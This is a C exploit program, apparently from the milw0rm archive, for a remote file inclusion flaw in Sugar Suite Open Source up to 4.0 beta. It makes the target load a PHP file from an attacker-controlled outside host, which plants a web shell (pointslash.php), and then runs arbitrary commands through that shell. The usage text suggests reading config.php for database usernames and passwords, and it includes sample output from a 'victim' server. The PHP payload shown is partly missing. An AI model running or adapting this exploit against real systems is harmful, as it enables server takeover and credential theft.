/* gcc -o sugar sugar.c Usage ./sugar [host] [/path/] [site] [cmd] Sugar Suite Open Source <= 4.0 beta remote code execution (c code) coded by: pointslash v. credits: rgod, unitedasia host - hostname (ex: www.sitename.com) path - path (ex: /sugar/ or just / ) site - remote location ( ex: http://www.somesite.com/file.txt) cmd - specify a command ("cat config.php" to see database username & password) example ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a; Put this in your file.txt "); fclose($fp); ?> ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al HTTP/1.1 200 OK Date: Thu, 08 Dec 2005 12:35:33 GMT Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27 X-Powered-By: PHP/4.3.10 Connection: close Content-Type: text/html Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown */ #include #include #include #include #include #include #include #include #define HTTP_PORT 80 #define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n\");\nfclose($fp);\n?>\n\n" /****************** MAIN *********************/ void sendpacket(char buffer[8192], int p, char host[100]); int main( int argc, char **argv) { char buffer[8192]; int count; char data[190]; if(argc<5) { printf("Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source <= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n",argv[0]); printf("host - hostname (ex:www.sitename.com)\n"); printf("path - path (ex: /sugar/ or just / )\n"); printf("site - remote location ( ex: http://www.somesite.com/file.txt)\n"); printf("cmd - specify a command (\"cat config.php\" to see database username & password)\n"); sprintf(data, DATA); printf(data); exit(1); } sprintf( buffer, "GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n", argv[2], argv[3], argv[1]); sendpacket(buffer,0,argv[1]); sprintf( buffer, "GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n", argv[2], argv[4], argv[1]); sendpacket(buffer,1,argv[1]); return count; } void sendpacket(char buffer[8192], int p, char host[100]) { struct sockaddr_in server; struct hostent *host_info; unsigned long addr; int sock; char dat[8192]; int count; /* create socket */ sock = socket( PF_INET, SOCK_STREAM, 0); if (sock < 0) { perror( "failed to create socket"); exit(1); } /* Create socketadress of Server * it is type, IP-adress and portnumber */ memset( &server, 0, sizeof (server)); /* convert the Servername to a IP-Adress */ host_info = gethostbyname( host); if (NULL == host_info) { fprintf( stderr, "unknown server: %s\n", host); exit(1); } memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length); server.sin_family = AF_INET; server.sin_port = htons( HTTP_PORT); /* connect to the server */ if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) { perror( "can't connect to server"); exit(1); } send( sock, buffer, strlen( buffer), 0); /* get the answer from server and put it out to stdout */ if (p==1) { do { count = recv( sock, buffer, sizeof(buffer), 0); write( 1, buffer, count); } while (count > 0); } /* close the connection to the server */ close ( sock); } // milw0rm.com [2005-12-08]